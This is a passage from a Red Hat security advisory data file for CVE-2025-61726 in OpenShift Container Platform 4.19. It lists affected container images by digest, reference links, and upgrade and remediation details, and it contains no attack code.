"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:a116039d2376221a308ad495493553e704358e9cfc2fa4104785f7dd7242b90a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:05e68f45e8578ef2401473deda111a57de11143bb3cd63f84742cfc1bdbde1de_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:99d76e0fcc4bd0f276d574ea2edad252b552301aa10e2e4241e0e9462fdd03e7_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:d3fbf646c682c41b45e5ac529e3fa35abdb2610c2e746bfe19a7a12867165968_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:ff983c80717ff42cf4c6484fa4c38a1df4c88fd40d4e05fa3c47434d949d256b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-cloud-controller-manager-rhel9@sha256:fdf18e2f91a8d7dfed9ab25f41666e1f3ff3c2a49866a1ff557629602b9f4726_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-cluster-api-controllers-rhel9@sha256:75c7ccaeda39a8ede8e78244478c7fb3dd03c1523ef3dcda8982cc8cc74a7aee_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-syncer-rhel9@sha256:0d1f878c9d72ed2e0cf721f35015c55385df1eb3eb9bf966bb7d626f7826baf3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-problem-detector-rhel9@sha256:0925ab89d006b1b2665e701f3943ad2684e31ce86408919378014ecb7f7403ed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:0f1cb5f6dd220cb36e689dfa996022085bafe7a06aa6b8f3e4737ca281e143c4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:27a24944f1ef11eb36634a670dc865b5ff0a15d2e11905b82498916d8e9bf580_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:dcffbfba5a93e392e08fb0d010fd9b75694c4411016d09852fc51239d5234e9d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:fe3bfd4f788d5fe7258d04338de8ba9df4638db341674caed43859927f6ee3f9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:15d38afb007a612060445e5725ead06ed81130b761b11661e608a0debe464d24_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:4e69689cecf4ba62c9a3b7305e80c15ad5fcccbc85fb59a7e2969e14c7fb85f3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:a7a04880260ecec43abbfe7546f34ab6db488e82574cd7e9b0befa5399b601e8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:dbca06ba2c04ea72c1eb33a6c9d1c075016531eb9f72fc589fe759e55a57c408_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-61726"
},
{
"category": "external",
"summary": "RHBZ#2434432",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2434432"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-61726",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61726"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-61726",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61726"
},
{
"category": "external",
"summary": "https://go.dev/cl/736712",
"url": "https://go.dev/cl/736712"
},
{
"category": "external",
"summary": "https://go.dev/issue/77101",
"url": "https://go.dev/issue/77101"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/Vd2tYVM8eUc",
"url": "https://groups.google.com/g/golang-announce/c/Vd2tYVM8eUc"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2026-4341",
"url": "https://pkg.go.dev/vuln/GO-2026-4341"
}
],
"release_date": "2026-01-28T19:30:31.215000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-16T10:18:08+00:00",
"details": "For OpenShift Container Platform 4.19 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this asynchronous errata update:\n\nhttps://docs.redhat.com/en/documentation/openshift_container_platform/4.19/html/release_notes/\n\nYou may download the oc tool and use it to inspect release image metadata for x86_64, s390x, ppc64le, and aarch64 architectures. The image digests may be found at https://quay.io/repository/openshift-release-dev/ocp-release?tab=tags.\n\nThe sha values for the release are as follows:\n\n (For x86_64 architecture)\n The image digest is sha256:b274766f7194a7dc825e335a54078790519c0dbe3431c029fd08dbba1c431855\n\n (For s390x architecture)\n The image digest is sha256:066bfcb590ef6f34106e63861d420a3fdcdebd734bb729668c8c6de59b84c632\n\n (For ppc64le architecture)\n The image digest is sha256:ff14e60b2b4760a6c2578e444b40f457fe2322f5211b1b838078b1fa6ea1b443\n\n (For aarch64 architecture)\n The image digest is sha256:52b1e8cf83dd1a854194212cc94bfe2719afb2e014f7b1a315250a9c7273a600\n\nAll OpenShift Container Platform 4.19 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift CLI (oc) or web console. Instructions for upgrading a cluster are available at https://docs.redhat.com/en/documentation/openshift_container_platform/4.19/html-single/updating_clusters/index#updating-cluster-cli.",
"product_ids": [
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a31c0d7654d2495710df721e8e1aa57ae47f028966ca83aaa1b74a5b57f0a276_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a657295bab1d29d15cdd77ce366dd388153b5783c054067ef0ecd1c84e76db4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a95b88717fb16e809ea0b8654929e2808eb6fed3b84e45bbe3886e020d7acac4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:e5b07464aedee0bfb213c132174a22fc66e279eb8f7688078a07657237a8d334_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:3a47a587be70333ba3719bb416fb04c176e41ce27d2c051b1210717857fd9b92_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:d48293acc1ecfd8e08eed3f47d3c37eb9d5905642a04e12ed26434a222ed0476_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:7249"
},
{
"category": "workaround",
"details": "Red Hat has investigated whether a possible mitigation exists for this issue, and has not been able to identify a practical example. Please update the affected package as soon as possible.",
"product_ids": [
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a31c0d7654d2495710df721e8e1aa57ae47f028966ca83aaa1b74a5b57f0a276_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a657295bab1d29d15cdd77ce366dd388153b5783c054067ef0ecd1c84e76db4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a95b88717fb16e809ea0b8654929e2808eb6fed3b84e45bbe3886e020d7acac4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:e5b07464aedee0bfb213c132174a22fc66e279eb8f7688078a07657237a8d334_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:4273b3050117faf7bb14fd2bbcf71c5606b7b6f1326fcc1a36cf3ed51f6b3de0_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:5a2ecf041953f1ac77ef2ff25b6ccbb1c7b7741bcca8eab2bdeae706019f6c83_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:9874d99c0cb18c7120982f093f99fde589255ef5cfb1c67b6a6e95cf66f87a91_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:e5c889f9c92df65efd279220829dc129023a34fd6c4b4d93264739852581cd93_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:35cd98a46072b8c966553d8bb60bc4ed2f3c055eeaf3e7c4d080ec9605f6a96f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6a108c888888fc9a2fb0a3b834aab6eb2a6c0b691a39e3461725f87580062a91_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6d2feee745979668785a904900f8c9d5327477f83361f26eb5879e87e081bd25_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:c17c46279d5ad92b5ad7a58a1dc1bb8331b15ab424e7274818a1c47898b528e2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:055fea2fc51b9eb48327b78542f420a1d65dbcf786324f7bcbeda053d3fd35bc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:1d66a8807c27cd43c86399e67ec86906edb97be4ca38b4a752bef1c880848083_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:980e2f5e0f0676e559e91d50e2927fb9bf2f598db0d1ba043440e04d76cf46b9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:dcd241b04a6e196ad8b66a9d3cce0df26f126e99a85ce7a5443e61dc76194e5b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:093a5ff464b31d0f1058c452843dd119dfd1798d91855dbe9fdbd5a45c912efb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:2320a5d225dccf8f02379818bee2e93ae87a8444698f20141f6a0425b1661601_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:46adf0538ec9fbd67abc4565c013f2503c2a11191de264310a2c770bfb566753_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:d48ca3a08fbb356d69be5b61274d75b701d48803a9d57c8d377ce2d0df83169a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:0b1b706bc5a0188d40950a1fdd30f8c410e68dd568ed7d07c1f09443fbde28f4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:173800cfc487973c018e8d9badb7d60d26509bbe0803e9a56fba1d5a65070dc0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:78a2368225915aca2a514c5d82ba82fff8e70e6123c08905c46839a821f4c8ab_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:e44aa77638b86f0ade3d4b69e150e8e9e95573ec90b6031224b87e404b5d6a79_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:313b7b7e1f619f5fd121ca2402d9db6876d021be227b496288809f63f1209561_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:5b232dcf5a47400d1b1d105895df8143b50dc74613b1463b275d6d304e0e0085_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:774dcaecbaa4f7b743b49c34a6a9889a27c6379110672a2f28fb4f83cb0f0fe6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:8d55cc650683e44676413797328fff9b3563eb78a1aae4cabe736b20e9f15ff4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:13cd27f7e445af565cef18a24ceca435b4ce2a0c99876b9ad087fdf50e343be6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:5eee15ae4f809e708dbba035fdf60bd2c331462bc6256df74f9124fac03be62b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:af94257f6dd0307527211d5ab2b77ff971d5432a003d4f8e2f1e884cf6ee5215_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:cba1849a3d647457c561e01daf7eda74d775430a8b95458684620c0ebb3f47d2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:1b9bd17c112e00f11fca3cfaea5908d0cd370598beb6909a3c00f58ca6774bee_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:2c646a3a35e8a4503f378096f6045fdb816fa9d5728cc14759748b7265aa47dc_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:47fd82ed75709dd28b0f9f2eab2a051e3bedac64d2fa11dc93a8a8a7159e287b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:e95f8dd80a31504ccf2ff1ea37026370e41edd179151f1c7c2901e5ed12c1296_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:65c161d7215a460b2295a2b4eb82e8bd7e2079e145596185f83d84c4676f1eed_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:8f7e2a8735cb9b09639c5a467b8656bd7dd1bd4f72bc50164f0e4623ffacd93c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:a045bd36d61b9586134423526ec66f4aa18c140958a01da59ffaa4003c229e4e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:d426bb25b78392f8093739e457ab75adf9366406e09ef18f8c75d8998a24731e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:17333d63845becea642ecb6fd8f76e7a4d698f8a661a981b59e9c920d1973d46_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:5c73127d0656e37837d8dba2e4770da5bc26885daf37a4d708a04399410d85a2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:ee3b7a97fb8e0f135e89f28c4f3ad31463a17003c92b979b4f16c262d8d69737_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:f59805de5ca2dde13a899b2058e1178288c80e4589515b08b89a6341f64fceb2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:4892cd8581f10f3338980a4bc69f02d8379e54fc0f4c4d11af27baec253ea11a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:92295081a775d918e0963d2aff01bb21fc1200ca06faf7a882c652ebeee8c8f0_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:a832bdd818c5c9aa386c7b8fc068c7e41454bd3ae5851e4a805e17c0a22485d5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:f3f2d167037e26af9b863e6561d2d64bcccdabfc3a6efa7f1085389ece519661_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:01d975619247a08e37e5d9fb38dcbca09555b283991441a4a208da524e4f8c74_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:04db41f215a8d65a168c117ad8cdbf0d0ca3dc4baaa5acede9e29beac647ce0e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:67d767e895fb0299033848441253b41588136a70e31763386c973672c26be496_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:be919e58f27fa8f244683d2b42e4aa2ab467dc93fe7c3c3c3b6032f3555627f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:083bb81614554fab84226913ccd021b11f7ef126606dbd10cabd727a501551e4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:1aa42ec77b3d3339df819904aa14a43382739617e532b5d0002a5e4ebc74736b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:83ef5cae2611a335710b324338a1f26d7e90a7918b4fe642e05e447e65d46b7d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:fa1d216867be999b74ea9e61644fe42315952afce3b6efce25308960adf393eb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:15832adc4ad8716113e5cb0aa6af6ab43aa6c4608e8909fe31041e46fce6ab42_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:596dad4fcad33b13f2db099ba3ac4aefa3e7ccde280a75b658df139227b63732_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:849b3cc7fe43ab6480fcd974e7796f5b8aa1e610add35558635b3c8afc602975_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:a35e6d40471cdcec9fa54afc1da4c2ddb4ff2739b65bc67ddbff655aaf45a09f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:6c6b2ab932649b97579c8a76f57d9c8f0c8b2dededcd0843563d7bb85d116b8b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ab8f35a5cc7907c3114427a3f46489cf2cc54650caa9d15b1654fff6f0e43dc3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ceedbad08f41cb0095006089b0595524a1ffa3c035f39e59d5ebbd5be07fcdce_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:fc090f33468f64fdd024263813034bd889ec44c61587ee9c1ecb8abdb9921da0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:23369a9840fe178321aa47458d1fea488bf37545f4a335d39ba4cc0711019c3e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:784f4206de4bb479ae43476c483face9ba3b209188b3a0201f66580b944fca02_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:87546cc6262c2c6eadb54266c42ccc03c3e2ad7c3c809ee21529f0bfb4707105_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:ed079597ea5b2fe6bf4d4b7efa09f6cb76691362c62a268accb0d5bb5fd7daed_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:2845efdf030408d0d545862b74020ec95c2e2f4c0fbcd6d5834002fd1f224b9a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:ae56b7456515539ec14105e5a8221b83dc53c1a5571a6e46e0c3b0632f98096c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b3351e1878d5ef1111ce4b2eca74bad875b8773b11b8597f83c11a7f7b226da7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b72fc45f6e78468f442c5bf487721227053eb0d49ef3eea5be6cef181007e290_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:12309e06f58c6b122ebc7ef2958ec0a0526edd9ea21b888866dcc2f753a7cf2d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:5727ab378cdf09a1eb20b6120da5ee6d66a1473ea0d7dfd0709faf5c53df615f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:d85ca66233c95a4b622d97b50ae304dab7cd3ea67efbc40ab9ddb723478104b7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:f26b039b69b5d006e04148dd4e7d6bcada2ae22c8892e094e43c6bb307a99cea_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:1f2b394a49751e0cbc81a776a8abefaee56aea8a2449a56f66ec4fb8bd7b36a0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:5a3bb13d5a7dfd660ce6ca1799af07ff0eb73148a51b3e5864fda09650186530_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:a676ed9f3d05a12ca0965f8b33d002d95cc8578f5a74f0bcf984594d784b0e3c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:dbd96ce5c1082dd3f2de07bd34f805d64952bee798cd96f2d9f94d195acbfd2e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:0104fa2a05916db8ce121350b3e026a74891560be71999451943090f63d727a2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:590caaaf15b7a11ce69df24820ddc1f4b0b7a1c7cc5d2e62e2c3bfd35a5bb733_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69d052085b27f034e581680b283ed51134f2d8d5c895f0b2984946c158304249_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69f33223ac1b30068c884ba58ef4f04545ed5d02dab43dd525ff3f66c299885f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:0beec3d7cd2663215fbfd97490b8aa1a684580e273dd9161d574f3ce5fe936b5_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:19636219d56bc03c8641e266ed3d82cae94bd7431e3da0c48ccba9bfb541ef6f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:2ad51487bd9dd02bdabe506d2c5758a9e9df2903a8a63d1a19d720281390eebc_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:7c081487e39de209265d2bb960fb68fa2997e1620f37bdd3bb1aac57483bbbe7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:13560a7a1ab60ebe5a593c4c6819d730f1e8fad5031a5a38b7aa8ebcb52776b9_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:4f90910be0a33320bf234e3c25b6c364a0e730d76be53fc8c7e50227c14e25e2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:7406a10e78b85749cd597d3ced8b69a87a7931119611e996dd8cd660ff1ac47c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:d710074f9ebfa1ec4e15c5ee4718b748259f8907f4ec0aa56045c00cf19a691c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:6bf2ac59bb7ee40409082d564bde5d5568be09bd21219fe0c62ebc6624912b1a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:8ad00ec95b55f781061f47a2b0b7b2ae6e557bb9cdbad826c097fde6a5b7d791_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:3dc93509b8cad942ffeea32ba1c75db4b94a66a8c1a6d7b29f13ed6ec83e5f9b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:ae91dc01aca5115ba88290f86ab266ad69b86c68c83097adafb82defdfc5c524_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:67f9c3e3f77df4be9e4925fe7c5fb4cb95d770395bbb1b32847c7100d8f9e8fe_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:ef09a660c5bd1b44464ed961ade4f9ceef47dfe1005efde15de94631dadebf4f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:d1a5ebdd8e8fcd15749e48a18cf340a309c6c219c8adf85d2df1caa773784d86_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:de7f8ba8b4ed81e733af2d6b40e2dbb97c7afdc627973bfb838bd69ed9183eba_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:15b866541c161693e74ad7106aec45b9713f81e1f3e2f10deb0822b58fbb884e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:240132f7cf6ec28b4f711323b5c9f10ba76e85ba0ed2e66c663096089fdcc128_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:2191714083728cc0984775c5b8c3ee972723c1378058f0923ab60036345d9825_arm64",
